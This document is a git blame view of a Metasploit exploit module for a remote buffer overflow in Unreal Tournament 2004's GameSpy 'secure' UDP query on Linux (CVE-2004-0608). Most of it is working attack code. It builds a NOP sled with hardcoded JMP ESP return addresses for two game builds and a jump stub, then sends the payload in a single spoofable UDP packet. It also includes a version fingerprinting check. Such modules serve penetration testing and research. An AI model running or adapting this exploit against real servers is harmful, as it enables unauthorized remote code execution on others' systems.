Files
metasploit-gs/modules/exploits/linux/games/ut2004_secure.rb
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

113 lines
2.9 KiB
Ruby
Raw Normal View History

##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2013-10-15 13:50:46 -05:00
# Current source: https://github.com/rapid7/metasploit-framework
##
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf::Exploit::Remote
2009-12-06 05:50:37 +00:00
Rank = GoodRanking
2013-08-30 16:28:54 -05:00
include Msf::Exploit::Remote::Udp
2013-08-30 16:28:54 -05:00
2005-12-26 14:34:22 +00:00
def initialize(info = {})
super(update_info(info,
2005-12-26 14:34:22 +00:00
'Name' => 'Unreal Tournament 2004 "secure" Overflow (Linux)',
'Description' => %q{
This is an exploit for the GameSpy secure query in
the Unreal Engine.
2013-08-30 16:28:54 -05:00
This exploit only requires one UDP packet, which can
be both spoofed and sent to a broadcast address.
Usually, the GameSpy query server listens on port 7787,
but you can manually specify the port as well.
2013-08-30 16:28:54 -05:00
The RunServer.sh script will automatically restart the
server upon a crash, giving us the ability to
bruteforce the service and exploit it multiple
times.
2005-12-26 14:34:22 +00:00
},
'Author' => [ 'onetwo' ],
'License' => BSD_LICENSE,
2005-12-26 14:34:22 +00:00
'References' =>
[
[ 'CVE', '2004-0608'],
[ 'OSVDB', '7217'],
2005-12-26 14:34:22 +00:00
[ 'BID', '10570'],
2013-08-30 16:28:54 -05:00
2005-12-26 14:34:22 +00:00
],
'Privileged' => true,
'Payload' =>
{
'Space' => 512,
'BadChars' => "\x5c\x00",
2013-08-30 16:28:54 -05:00
2005-12-26 14:34:22 +00:00
},
'Platform' => 'linux',
'Targets' =>
2005-12-26 14:34:22 +00:00
[
['UT2004 Linux Build 3120', { 'Rets' => [ 0x0884a33b, 0x08963460 ] }], #JMP ESP , (free/realloc) BSS pointer
['UT2004 Linux Build 3186', { 'Rets' => [ 0x088c632f, 0x089eb2f0 ] }],
],
2020-10-02 17:38:06 +01:00
'DisclosureDate' => '2004-06-18'))
2013-08-30 16:28:54 -05:00
register_options(
[
Opt::RPORT(7787)
])
2005-12-26 14:34:22 +00:00
end
2013-08-30 16:28:54 -05:00
2005-12-26 14:34:22 +00:00
def exploit
connect_udp
2013-08-30 16:28:54 -05:00
2005-12-26 14:34:22 +00:00
buf = make_nops(1024)
buf[24, 4] = [target['Rets'][1]].pack('V')
buf[44, 4] = [target['Rets'][0]].pack('V')
buf[56, 4] = [target['Rets'][1]].pack('V')
2005-12-26 14:34:22 +00:00
buf[48, 6] = "\x8d\x64\x24\x0c\xff\xe4" #LEA/JMP
2013-08-30 16:28:54 -05:00
2005-12-26 14:34:22 +00:00
buf[0, 8] = "\\secure\\"
buf[buf.length - payload.encoded.length, payload.encoded.length] = payload.encoded
2013-08-30 16:28:54 -05:00
udp_sock.put(buf)
2013-08-30 16:28:54 -05:00
2005-12-26 14:34:22 +00:00
handler
disconnect_udp
end
2013-08-30 16:28:54 -05:00
2005-12-26 14:34:22 +00:00
def ut_version
connect_udp
udp_sock.put("\\basic\\")
res = udp_sock.recvfrom(8192)
disconnect_udp
2013-08-30 16:28:54 -05:00
2005-12-26 14:34:22 +00:00
if (res and (m=res.match(/\\gamever\\([0-9]{1,5})/)))
return m[1]
end
2013-08-30 16:28:54 -05:00
2005-12-26 14:34:22 +00:00
return
end
2013-08-30 16:28:54 -05:00
2005-12-26 14:34:22 +00:00
def check
vers = ut_version
2013-08-30 16:28:54 -05:00
2005-12-26 14:34:22 +00:00
if (not vers)
2014-01-22 11:20:10 -06:00
vprint_status("Could not detect Unreal Tournament Server")
return Exploit::CheckCode::Unknown
2005-12-26 14:34:22 +00:00
end
2013-08-30 16:28:54 -05:00
2005-12-26 14:34:22 +00:00
print_status("Detected Unreal Tournament Server Version: #{vers}")
if (vers =~ /^(3120|3186|3204)$/)
2014-01-22 11:20:10 -06:00
vprint_status("This system appears to be exploitable")
2005-12-26 14:34:22 +00:00
return Exploit::CheckCode::Appears
end
2013-08-30 16:28:54 -05:00
2005-12-26 14:34:22 +00:00
if (vers =~ /^(2...)$/)
2014-01-22 11:20:10 -06:00
vprint_status("This system appears to be running UT2003")
2005-12-26 14:34:22 +00:00
return Exploit::CheckCode::Detected
end
2013-08-30 16:28:54 -05:00
2014-01-22 11:20:10 -06:00
vprint_status("This system appears to be patched")
2005-12-26 14:34:22 +00:00
return Exploit::CheckCode::Safe
end
end